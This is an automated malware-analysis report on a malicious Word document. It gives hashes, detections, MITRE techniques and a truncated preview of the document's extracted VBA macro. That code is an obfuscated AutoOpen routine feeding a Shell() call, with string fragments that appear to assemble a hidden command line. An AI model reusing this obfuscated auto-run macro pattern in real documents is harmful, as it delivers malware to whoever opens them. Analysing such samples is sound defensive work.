Office (OLE) malware analysis — malicious · 8c285fa1421bdc5b

MALICIOUS

Office (OLE)

116.9 KB Created: 2018-09-26 17:04:00 Authoring application: Microsoft Office Word First seen: 2019-02-10

MD5: 9f7172e44621dfd087785b0dc2868a04 SHA-1: c1fa404889be5baff7b68edb5797536c3bfcd604 SHA-256: 8c285fa1421bdc5be91c159be7e99ea5065e3cb482cb73dcd44b1a0d46d0e4d6

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, a critical heuristic indicating an attempt to execute arbitrary commands. The obfuscated nature of the script prevents a precise determination of the payload, but the presence of Shell() strongly suggests it's designed to download and execute a secondary malicious component.

Heuristics 6

ClamAV: Doc.Malware.00536d-6698605-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6698605-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 73848 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	73848 bytes
SHA-256: `d690ca5ad2b7d35bf2f3059580f477897e9ffbffce1a9f41273f33d7d268134f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "SBnquSXU" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim nKkwI(2) nKkwI(0) = MidB(MzUrObE + pwGlcawGjsscRztHvw + DwwjsL, 315, 281) + Right(TYRXa + jlrZsjkfkQiwQNfoiQhn + ohIsSk, 448) nKkwI(1) = Right(LKRqKN + IbzjGGskUlSXCEEBcn + tmdFCOrs, 516) + Right(ZLqoh + ziPldJMQlGMmPGudpDis + CLdmK, 302) + Left(aoikHI + qwFmOdwijuEzwVpbkfZFVk + bHrzl, 931) + Mid(jnpwYO + bURQbtwjjwPjBRRVask + DloCz, 586, 53) Dim kNFtrV(2) kNFtrV(0) = Mid(huQUwT + XiFVrLmQTahFcPavsY + aWVLHTzd, 695, 353) + Mid(BXGwPCTd + iAGpoEYXhrmizESQpq + kDEJcfqF, 57, 389) kNFtrV(1) = MidB(VERfuFMF + PsHdGwANESAWmjvWcoRzLAE + VkiKMko, 235, 49) + Mid(sEpmaV + fvzJUiKzsvcCrwaInl + swSiXw, 603, 481) + MidB(VHrWbJb + qTGWWjwpAMhzhYBEmMS + zjEXV, 408, 323) + MidB(LGDmawz + pYcwYTPPHXPAAYpcS + jfvlaU, 392, 723) Dim XiASjk(1) XiASjk(0) = Left(vSFAdw + nfHtUqLKNqwCiZftOi + hMLzSDH, 497) + Left(zJzvd + npHTtfwPaawCEuZhIM + CnBcq, 781) + Mid(wPjbtcQ + nACchbmfFEVvHAFjrCiIM + jVzacim, 3, 408) + MidB(fUMPzK + NAHfMMWkiFspkErQdaivm + BkUcDXZO, 603, 546) Dim iMuDj(2) iMuDj(0) = MidB(pwrcLR + mTdNsRTHaMzsETYaWw + LpivA, 450, 3) + MidB(rnUuw + zRsmdhYqFmImOEPRXJM + HMGwAfwG, 86, 350) + Mid(FvbrI + ukraPZPijrAvfQOlY + jDVNh, 168, 187) + Right(PwHWLPl + bQUaMVrFPKdWmEnFBXQFp + ziikPiX, 878) iMuDj(1) = MidB(mGrzWczt + sMMhHcjoKKiUkXZAfFdpB + wFfuRLLI, 688, 710) + MidB(cnwiZljI + bIBZtrPXKjJfatzSLAm + zMhXDDS, 868, 235) Dim Psfti(2) Psfti(0) = Mid(zAcsUBf + CibwZGzlmhIiYhEmGFSNNd + tErhfs, 836, 711) + Mid(lkJshHwB + cvJXwtMjUNVFsuFCPr + rKUdN, 445, 210) + Right(BPrwu + mofBJdQWnoNrzNZSNbQroYD + dvHwaU, 313) + Mid(luOud + izZMnpCcGIVzFbwNbfq + jmNDzD, 363, 963) Psfti(1) = Right(Gbiojo + VULuiIpnwQfKDdBczJY + MjjCa, 740) + MidB(iiVSKo + vHQUhdVPaLiMsrAhzlFOA + wQVrsptj, 85, 33) Dim WtsSMR(2) WtsSMR(0) = MidB(HQTHXZ + jpaGoNWcRTLTsmzmfBjFufZ + dEJwDL, 655, 64) + MidB(pIXPmvz + OdVRbmUrkfaPabIVHHKjL + iIluK, 946, 433) + Right(lIniMj + TGJaiPRmcCmDLUIMF + iDlAVq, 775) + MidB(XnjQE + vsUjXVUVszbOEXOYFohtbWN + zXcGNnM, 377, 726) WtsSMR(1) = Right(Njufd + LEAZKfssOwsBqszP + arDcwr, 223) + MidB(CPhJBOiZ + aVvwVLrLtBhOCMwzOjUW + iLDIn, 228, 366) QwckjikIDUX (KeyString(Lcvdz + EFFJJWz + 9 + 13 + 45 + lBGVP + ozCmww) + CRKBwEX + zOXOaVZ + KeyString(QijzkpoG + zWjFKbH + 11 + 15 + 51 + wlwOc + BAGNbd) + JZJLooFXHQM + IsvwDX + NDjXLzQI + TqaUICNjAWE + CfiHl + TDYOv + iKTlzbl + nYlKGKGp) Dim mqjFt(1) mqjFt(0) = MidB(VkcopoO + nRUOZziGzFiijdOjmBFaLRF + CzjXmHX, 783, 403) + Mid(oLacwTAn + ZhwhkzhrzTztEhvaMot + sbbdd, 843, 323) + Mid(lcPmqBKp + hXrRWilENoKfDJVENQjBw + QaruPWr, 651, 919) + MidB(JEjuG + KazLqrpkjvsJufIu + STzISnAQ, 460, 365) Dim VGUIzf(1) VGUIzf(0) = MidB(NwRraEj + KzuTkjHRvubFzCjuahqjG + sStnj, 482, 323) + MidB(MjikWM + kjzHzLfpdHHoDjqpY + VKGkpz, 318, 579) Dim qpwZQ(2) qpwZQ(0) = MidB(ChIrvJru + bEjXRoVKBMZLOLutWPmkumq + aBPqwH, 793, 495) + Left(ZBaObujc + fAPbPWcplkbkzkVdDZlrE + wAKpKKU, 196) qpwZQ(1) = MidB(lnbaiA + FzQbdnNzSTuklZci + aGaIKCz, 887, 64) + Left(fawtMU + jwLCqwaDqACVirqTTlLT + uOjMqYFF, 144) + MidB(PEkLubt + WDEjUWBDlUJvihON + zOdNOmGH, 478, 186) + Right(sWrJAr + DBVdAvodMNHZpbVFP + ibDNWmEY, 639) Dim woidE(1) woidE(0) = Mid(CamHmuGI + BmLBHGADXNrYMjaEaRbY + XfLKN, 231, 605) + Left(WjzTo + dBLcKCZCNjDZsZOkMupqMir + kkNlIwna, 237) End Sub Attribute VB_Name = "OsvsANOrRd" Function JZJLooFXHQM() tzAZjJRlV = "d / \//// / /\ /V" + ":O/C" + """" + "set $};=a270 2" + "a07 a270 07" + "2a a720 20a7" + " 0a27 0a72 02" zfLUJuzp = "a7 70a2 a207 a" + "270 7a02 02a7" + " 702a 027a a207 07" RNCUJKqp = "2a}7a20}270a{a" + "720h7a20c207" + "at072aaa207c02a7" + "}a720;27a0k720" + "aa20a7e07a2r20a" tnmJGksooEw = "7b072a;a702j7" + "0a2O270aaa270$a270" + " 2a70ma027e" + "a270t7a20I" + "20a7-072ae0a72ka072" JZJLooFXHQM = tzAZjJRlV + zfLUJuzp + RNCUJKqp + tnmJGksooEw Dim OJlDrF( ... (truncated)

SHA-256: d690ca5ad2b7d35bf2f3059580f477897e9ffbffce1a9f41273f33d7d268134f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "SBnquSXU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim nKkwI(2)
nKkwI(0) = MidB(MzUrObE + pwGlcawGjsscRztHvw + DwwjsL, 315, 281) + Right(TYRXa + jlrZsjkfkQiwQNfoiQhn + ohIsSk, 448)
nKkwI(1) = Right(LKRqKN + IbzjGGskUlSXCEEBcn + tmdFCOrs, 516) + Right(ZLqoh + ziPldJMQlGMmPGudpDis + CLdmK, 302) + Left(aoikHI + qwFmOdwijuEzwVpbkfZFVk + bHrzl, 931) + Mid(jnpwYO + bURQbtwjjwPjBRRVask + DloCz, 586, 53)
   Dim kNFtrV(2)
kNFtrV(0) = Mid(huQUwT + XiFVrLmQTahFcPavsY + aWVLHTzd, 695, 353) + Mid(BXGwPCTd + iAGpoEYXhrmizESQpq + kDEJcfqF, 57, 389)
kNFtrV(1) = MidB(VERfuFMF + PsHdGwANESAWmjvWcoRzLAE + VkiKMko, 235, 49) + Mid(sEpmaV + fvzJUiKzsvcCrwaInl + swSiXw, 603, 481) + MidB(VHrWbJb + qTGWWjwpAMhzhYBEmMS + zjEXV, 408, 323) + MidB(LGDmawz + pYcwYTPPHXPAAYpcS + jfvlaU, 392, 723)
   Dim XiASjk(1)
XiASjk(0) = Left(vSFAdw + nfHtUqLKNqwCiZftOi + hMLzSDH, 497) + Left(zJzvd + npHTtfwPaawCEuZhIM + CnBcq, 781) + Mid(wPjbtcQ + nACchbmfFEVvHAFjrCiIM + jVzacim, 3, 408) + MidB(fUMPzK + NAHfMMWkiFspkErQdaivm + BkUcDXZO, 603, 546)
   Dim iMuDj(2)
iMuDj(0) = MidB(pwrcLR + mTdNsRTHaMzsETYaWw + LpivA, 450, 3) + MidB(rnUuw + zRsmdhYqFmImOEPRXJM + HMGwAfwG, 86, 350) + Mid(FvbrI + ukraPZPijrAvfQOlY + jDVNh, 168, 187) + Right(PwHWLPl + bQUaMVrFPKdWmEnFBXQFp + ziikPiX, 878)
iMuDj(1) = MidB(mGrzWczt + sMMhHcjoKKiUkXZAfFdpB + wFfuRLLI, 688, 710) + MidB(cnwiZljI + bIBZtrPXKjJfatzSLAm + zMhXDDS, 868, 235)
   Dim Psfti(2)
Psfti(0) = Mid(zAcsUBf + CibwZGzlmhIiYhEmGFSNNd + tErhfs, 836, 711) + Mid(lkJshHwB + cvJXwtMjUNVFsuFCPr + rKUdN, 445, 210) + Right(BPrwu + mofBJdQWnoNrzNZSNbQroYD + dvHwaU, 313) + Mid(luOud + izZMnpCcGIVzFbwNbfq + jmNDzD, 363, 963)
Psfti(1) = Right(Gbiojo + VULuiIpnwQfKDdBczJY + MjjCa, 740) + MidB(iiVSKo + vHQUhdVPaLiMsrAhzlFOA + wQVrsptj, 85, 33)
   Dim WtsSMR(2)
WtsSMR(0) = MidB(HQTHXZ + jpaGoNWcRTLTsmzmfBjFufZ + dEJwDL, 655, 64) + MidB(pIXPmvz + OdVRbmUrkfaPabIVHHKjL + iIluK, 946, 433) + Right(lIniMj + TGJaiPRmcCmDLUIMF + iDlAVq, 775) + MidB(XnjQE + vsUjXVUVszbOEXOYFohtbWN + zXcGNnM, 377, 726)
WtsSMR(1) = Right(Njufd + LEAZKfssOwsBqszP + arDcwr, 223) + MidB(CPhJBOiZ + aVvwVLrLtBhOCMwzOjUW + iLDIn, 228, 366)
QwckjikIDUX (KeyString(Lcvdz + EFFJJWz + 9 + 13 + 45 + lBGVP + ozCmww) + CRKBwEX + zOXOaVZ + KeyString(QijzkpoG + zWjFKbH + 11 + 15 + 51 + wlwOc + BAGNbd) + JZJLooFXHQM + IsvwDX + NDjXLzQI + TqaUICNjAWE + CfiHl + TDYOv + iKTlzbl + nYlKGKGp)
   Dim mqjFt(1)
mqjFt(0) = MidB(VkcopoO + nRUOZziGzFiijdOjmBFaLRF + CzjXmHX, 783, 403) + Mid(oLacwTAn + ZhwhkzhrzTztEhvaMot + sbbdd, 843, 323) + Mid(lcPmqBKp + hXrRWilENoKfDJVENQjBw + QaruPWr, 651, 919) + MidB(JEjuG + KazLqrpkjvsJufIu + STzISnAQ, 460, 365)
   Dim VGUIzf(1)
VGUIzf(0) = MidB(NwRraEj + KzuTkjHRvubFzCjuahqjG + sStnj, 482, 323) + MidB(MjikWM + kjzHzLfpdHHoDjqpY + VKGkpz, 318, 579)
   Dim qpwZQ(2)
qpwZQ(0) = MidB(ChIrvJru + bEjXRoVKBMZLOLutWPmkumq + aBPqwH, 793, 495) + Left(ZBaObujc + fAPbPWcplkbkzkVdDZlrE + wAKpKKU, 196)
qpwZQ(1) = MidB(lnbaiA + FzQbdnNzSTuklZci + aGaIKCz, 887, 64) + Left(fawtMU + jwLCqwaDqACVirqTTlLT + uOjMqYFF, 144) + MidB(PEkLubt + WDEjUWBDlUJvihON + zOdNOmGH, 478, 186) + Right(sWrJAr + DBVdAvodMNHZpbVFP + ibDNWmEY, 639)
   Dim woidE(1)
woidE(0) = Mid(CamHmuGI + BmLBHGADXNrYMjaEaRbY + XfLKN, 231, 605) + Left(WjzTo + dBLcKCZCNjDZsZOkMupqMir + kkNlIwna, 237)
End Sub


Attribute VB_Name = "OsvsANOrRd"
Function JZJLooFXHQM()
tzAZjJRlV = "d /  \//// /   /\ /V" + ":O/C" + """" + "set $};=a270 2" + "a07 a270 07" + "2a a720 20a7" + " 0a27 0a72 02"
zfLUJuzp = "a7 70a2 a207 a" + "270 7a02 02a7" + " 702a 027a a207 07"
RNCUJKqp = "2a}7a20}270a{a" + "720h7a20c207" + "at072aaa207c02a7" + "}a720;27a0k720" + "aa20a7e07a2r20a"
tnmJGksooEw = "7b072a;a702j7" + "0a2O270aaa270$a270" + " 2a70ma027e" + "a270t7a20I" + "20a7-072ae0a72ka072"
JZJLooFXHQM = tzAZjJRlV + zfLUJuzp + RNCUJKqp + tnmJGksooEw
   Dim OJlDrF(
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.